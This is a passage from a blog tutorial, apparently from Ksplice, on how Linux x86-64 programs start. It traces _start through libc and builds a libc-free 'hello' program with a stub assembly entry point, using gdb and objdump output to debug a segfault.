From the perspective of the linker, by default _start is the actual entry point to your program, not main. It is normally defined in the crt1.o ELF relocatable. We can verify this by linking against crt1.o and noting that _start is now found (although we develop other problems by not having defined other necessary libc startup symbols):
# Compile the source files but don't link
jesstess@kid-charlemagne:~/c$ gcc -Os -c hello.c
# Now try to link
jesstess@kid-charlemagne:~/c$ ld /usr/lib/crt1.o -o hello hello.o
/usr/lib/crt1.o: In function `_start':
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:106: undefined reference to `__libc_csu_fini'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:107: undefined reference to `__libc_csu_init'
/build/buildd/glibc-2.9/csu/../sysdeps/x86_64/elf/start.S:113: undefined reference to `__libc_start_main'
This check conveniently also tells us where _start lives in the libc source: sysdeps/x86_64/elf/start.S for this particular machine. This delightfully well-commented file exports the _start symbol, sets up the stack and some registers, and calls __libc_start_main. If we look at the very bottom of csu/libc-start.c we see the call to our program’s main:
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
and down the rabbit hole we go.
So that’s what _start is all about. Conveniently, we can summarize what happens between _start and the call to main as “set up a bunch of stuff for libc and then call main”, and since we don’t care about libc, let’s just export our own _start symbol that just calls main and link against that:
jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
call main
Compiling and running with our stub _start assembly file:
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
Segmentation fault

Hurrah, our compilation problems go away! However, we still segfault. Why? Let’s compile with debugging information and take a look in gdb. We’ll set a breakpoint at main and step through until the segfault:
jesstess@kid-charlemagne:~/c$ gcc -g -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ gdb hello
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x4000f4: file hello.c, line 3.
(gdb) run
Starting program: /home/jesstess/c/hello

Breakpoint 1, main () at hello.c:5
5 char *str = "Hello World";
(gdb) step
6 return 0;
(gdb) step
7 }
(gdb) step
0x00000000004000ed in _start ()
(gdb) step
Single stepping until exit from function _start,
which has no line number information.
main () at helloint.c:4
4 {
(gdb) step

Breakpoint 1, main () at helloint.c:5
5 char *str = "Hello World";
(gdb) step
6 return 0;
(gdb) step
7 }
(gdb) step

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000001 in ?? ()
(gdb)
Wait, what? Why are we running through main twice? …It’s time to look at the assembly:
jesstess@kid-charlemagne:~/c$ objdump -d hello

hello: file format elf64-x86-64

Disassembly of section .text:

00000000004000e8 <_start>:
4000e8: e8 03 00 00 00 callq 4000f0
4000ed: 90 nop
4000ee: 90 nop
4000ef: 90 nop

00000000004000f0 :
4000f0: 55 push %rbp
4000f1: 48 89 e5 mov %rsp,%rbp
4000f4: 48 c7 45 f8 03 01 40 movq $0x400103,-0x8(%rbp)
4000fb: 00
4000fc: b8 00 00 00 00 mov $0x0,%eax
400101: c9 leaveq
400102: c3 retq

D’oh! Let’s save a detailed examination of the assembly for later, but in brief: when we return from the callq to main we hit some nops and run right back into main. Since we re-entered main without putting a return instruction pointer on the stack as part of the standard prologue for calling a function, the second call to retq tries to pop a bogus return instruction pointer off the stack and jump to it and we bomb out. We need an exit strategy.
Literally. After the return from callq, push 1, the syscall number for SYS_exit, into %eax, and because we want to say that we’re exiting cleanly, put a status of 0, SYS_exit’s only argument, into %ebx. Then make the interrupt to drop into the kernel with int $0x80.
jesstess@kid-charlemagne:~/c$ cat stubstart.S
.globl _start

_start:
call main
movl $1, %eax
xorl %ebx, %ebx
int $0x80
jesstess@kid-charlemagne:~/c$ gcc -nostdlib stubstart.S -o hello hello.c
jesstess@kid-charlemagne:~/c$ ./hello
jesstess@kid-charlemagne:~/c$

Success! It compiles, it runs, and if we step through this new version under gdb it even exits normally.
Hello from a libc-free world!
Stay tuned for Part 2, where we’ll walk through the parts of the executable in earnest and watch what happens to it as we add complexity, in the process understanding more about x86 linking and calling conventions and the structure of an ELF binary.
reference: http://blog.ksplice.com/2010